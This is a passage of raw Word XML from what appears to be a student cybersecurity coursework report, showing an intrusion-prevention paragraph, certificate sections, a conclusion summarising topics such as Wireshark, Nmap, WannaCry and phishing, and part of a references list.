          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[21]</w:t>
          </w:r>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="7D71B6F1" w14:textId="77777777" w:rsidR="005D6F12" w:rsidRPr="006010C3" w:rsidRDefault="005D6F12" w:rsidP="002B0E80"/>
    <w:p w14:paraId="35003A07" w14:textId="7178A9B1" w:rsidR="005D6F12" w:rsidRPr="006010C3" w:rsidRDefault="005D6F12" w:rsidP="002B0E80">
      <w:r w:rsidRPr="006010C3">
        <w:t>Another example of hardware that can secure a network is an intrusion prevention system(IPS). IPS is constantly monitoring a networking and blocks out any suspicious activity reducing risk of people getting into the network.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1367014709"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION VmwNA \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00EF0FCB" w:rsidRPr="00EF0FCB">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[22]</w:t>
          </w:r>
          <w:r w:rsidR="000D6B6C" w:rsidRPr="006010C3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="48A77A32" w14:textId="77777777" w:rsidR="002B0E80" w:rsidRPr="006010C3" w:rsidRDefault="002B0E80" w:rsidP="002B0E80"/>
    <w:p w14:paraId="7BA47FBB" w14:textId="77777777" w:rsidR="00A622BD" w:rsidRPr="006010C3" w:rsidRDefault="00A622BD" w:rsidP="00C7109A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517DB839" w14:textId="1857C8B9" w:rsidR="00C269FB" w:rsidRPr="006010C3" w:rsidRDefault="00C269FB" w:rsidP="009119E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc165489690"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>Complete “Introduction to Packet Tracer” in Skills for all. and attach the Certificate of Completion</w:t>
      </w:r>
      <w:r w:rsidR="00A622BD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>and share your digital badge link to verify.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="2C857EA2" w14:textId="77777777" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3"/>
    <w:p w14:paraId="69083707" w14:textId="1618210F" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3">
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B8E74F" wp14:editId="32C8403E">
            <wp:extent cx="3779520" cy="2277509"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1903475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475089" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3804960" cy="2292839"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FEEB49" w14:textId="77777777" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3"/>
    <w:p w14:paraId="54547E15" w14:textId="77777777" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3"/>
    <w:p w14:paraId="67A14FB9" w14:textId="77777777" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3"/>
    <w:p w14:paraId="7C0E8AAB" w14:textId="34560919" w:rsidR="00C269FB" w:rsidRPr="006010C3" w:rsidRDefault="00C269FB" w:rsidP="00EF0FCB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc165489691"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>ii) Complete all the 5 Module Exams and Final Exam for Palo Alto Network Security Fundamentals</w:t>
      </w:r>
      <w:r w:rsidR="00A622BD" w:rsidRPr="006010C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006010C3">
        <w:t>and Cybersecurity Foundation and submit the certificate to verify</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="3ECA03B4" w14:textId="5C365AA2" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3">
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C3FE067" wp14:editId="3683FE0B">
            <wp:extent cx="3070860" cy="2163143"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1785111365" name="Picture 1" descr="A certificate of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111365" name="Picture 1" descr="A certificate of security&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3090792" cy="2177183"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF99C7" w14:textId="77777777" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3"/>
    <w:p w14:paraId="73CEE871" w14:textId="3311F647" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3">
      <w:r w:rsidRPr="006010C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5321C72D" wp14:editId="41C3F201">
            <wp:extent cx="3176868" cy="2240280"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="810755268" name="Picture 1" descr="A close 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755268" name="Picture 1" descr="A close up of a certificate&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3182405" cy="2244185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B911D" w14:textId="77777777" w:rsidR="009119E3" w:rsidRPr="006010C3" w:rsidRDefault="009119E3" w:rsidP="009119E3"/>
    <w:p w14:paraId="408269A1" w14:textId="454A0C43" w:rsidR="00832908" w:rsidRDefault="00D479CB" w:rsidP="00DA09B7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc165489692"/>
      <w:r w:rsidRPr="006010C3">
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="0A37BBDC" w14:textId="4FEFEA4A" w:rsidR="00D73C8B" w:rsidRDefault="00D73C8B" w:rsidP="006010C3">
      <w:r>
        <w:t xml:space="preserve">In conclusion in </w:t>
      </w:r>
      <w:r w:rsidR="00344FB3">
        <w:t xml:space="preserve">part 1 of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidR="00344FB3">
        <w:t>report,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I have explained what the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D73C8B">
        <w:t>NIST Cybersecurity Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and how it ties a back to the introduction and the prompt given.</w:t>
      </w:r>
      <w:r w:rsidR="00344FB3">
        <w:t xml:space="preserve"> Then I have explained Wireshark and Nmap and how they are applied to the </w:t>
      </w:r>
      <w:r w:rsidR="00765219">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00765219" w:rsidRPr="00765219">
        <w:t xml:space="preserve">econnaissance </w:t>
      </w:r>
      <w:r w:rsidR="00344FB3">
        <w:t xml:space="preserve">stage. </w:t>
      </w:r>
      <w:r>
        <w:t>After that I talked about Wanna cry and TeleRat with an explanation about what they do</w:t>
      </w:r>
      <w:r w:rsidR="00344FB3">
        <w:t xml:space="preserve"> and how to prevent them from being effected. Also, I have explained pharming and whaling which are types of phishing, I also suggested mitigation strategies for them. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A928807" w14:textId="77777777" w:rsidR="00344FB3" w:rsidRDefault="00344FB3" w:rsidP="006010C3"/>
    <w:p w14:paraId="6DCA506F" w14:textId="0DD5C621" w:rsidR="00344FB3" w:rsidRDefault="00344FB3" w:rsidP="00344FB3">
      <w:r>
        <w:t>Moving on to part 2 of the report I created a network topology that was able to eliminate single points of failure and provide for reliable crossover.</w:t>
      </w:r>
      <w:r w:rsidR="00765219">
        <w:t xml:space="preserve"> After that I discussed software and hardware that is beneficial for network security. Finally, I showed certificates of completion for </w:t>
      </w:r>
      <w:r w:rsidR="00765219" w:rsidRPr="00765219">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Introduction to Packet Tracer, Palo Alto Network Security Fundamentals and Cybersecurity Foundation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D27DE3" w14:textId="77777777" w:rsidR="006010C3" w:rsidRDefault="006010C3" w:rsidP="006010C3"/>
    <w:p w14:paraId="24650FB7" w14:textId="77777777" w:rsidR="006010C3" w:rsidRPr="006010C3" w:rsidRDefault="006010C3" w:rsidP="006010C3"/>
    <w:bookmarkStart w:id="18" w:name="_Toc165489693" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1435516494"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="06CE69D9" w14:textId="33A828F5" w:rsidR="00832908" w:rsidRPr="006010C3" w:rsidRDefault="00832908">
          <w:pPr>
            <w:pStyle w:val="Heading1"/>
          </w:pPr>
          <w:r w:rsidRPr="006010C3">
            <w:t>References</w:t>
          </w:r>
          <w:bookmarkEnd w:id="18"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="-573587230"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w14:paraId="1F260E39" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00832908">
              <w:pPr>
                <w:rPr>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="006010C3">
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidRPr="006010C3">
                <w:instrText xml:space="preserve"> BIBLIOGRAPHY </w:instrText>
              </w:r>
              <w:r w:rsidRPr="006010C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7"/>
                <w:gridCol w:w="8799"/>
              </w:tblGrid>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="0C27EFBD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="292ADE74" w14:textId="493C08AF" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:kern w:val="0"/>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                        <w14:ligatures w14:val="none"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6CA4DFBB" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>National Institute of Standards and Technology, “NIST.CSWP.29,” 26 February 2024. [Online]. Available: https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.29.pdf. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="27E38CB3" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7324E13A" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="68E1576B" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>eccouncil, “Understanding the Five Phases of the Penetration Testing Process,” 28 March 2022. [Online]. Available: https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/penetration-testing-phases/. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="107588B6" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5F9966EC" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1B0E58E8" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>V. Muhungu, “https://www.techtarget.com/searchnetworking/tip/Types-of-Nmap-scans-and-best-practices#:~:text=Nmap%20is%20a%20common%20tool%20used%20during%20the%20reconnaissance%20stage.&amp;text=Conducting%20a%20scan%20helps%20determine,opened%20ports%2C%20services%20and%,” 9 August 2023. [Online]. Available: https://www.techtarget.com/searchnetworking/tip/Types-of-Nmap-scans-and-best-practices#:~:text=Nmap%20is%20a%20common%20tool%20used%20during%20the%20reconnaissance%20stage.&amp;text=Conducting%20a%20scan%20helps%20determine,opened%20ports%2C%20services%20and%. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="66F24DE9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="080A6C16" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="12E143CA" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>S. Alberts, “Wireshark: A Powerful Tool for Cybersecurity Analysis,” 6 July 2023. [Online]. Available: https://www.linkedin.com/pulse/wireshark-powerful-tool-cybersecurity-analysis-shanneece-</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t>alberts#:~:text=Reconnaissance%3A,%2C%20services%2C%20and%20potential%20vulnerabilities. [Accessed 28 May 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="73E085B2" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="78A3BFF4" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3D07EB74" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>D. Tidmarsh, “Network Packet Capturing and Analysis with Wireshark,” 26 May 2023. [Online]. Available: https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/wireshark-packet-capturing-analysis/. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="6AE220A8" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="07760596" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="55C11226" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Wireshark, “CaptureFilters,” 11 August 2020. [Online]. Available: https://wiki.wireshark.org/CaptureFilters. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="05547D81" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="000BB99B" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5CDC2A6D" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>A. S. Gilis, “WannaCry ransomware,” N/A. [Online]. Available: https://www.techtarget.com/searchsecurity/definition/WannaCry-ransomware. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="21D0AB89" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="155F802E" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0BC50EAD" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Malwarebytes, “computer worm,” N/A. [Online]. Available: https://www.malwarebytes.com/computer-worm. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="5D2D8605" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5D517272" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="18A06ACA" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>B. Lenaerts-Bergmans, “WHAT IS A COMPUTER WORM?,” crowdstrike, 31 July 2023. [Online]. Available: https://www.crowdstrike.com/cybersecurity-101/malware/computer-worm/. [Accessed 28 April 2024].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00EF0FCB" w14:paraId="2ECB301C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="883178404"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="367B6853" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="375E1151" w14:textId="77777777" w:rsidR="00EF0FCB" w:rsidRDefault="00EF0FCB">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
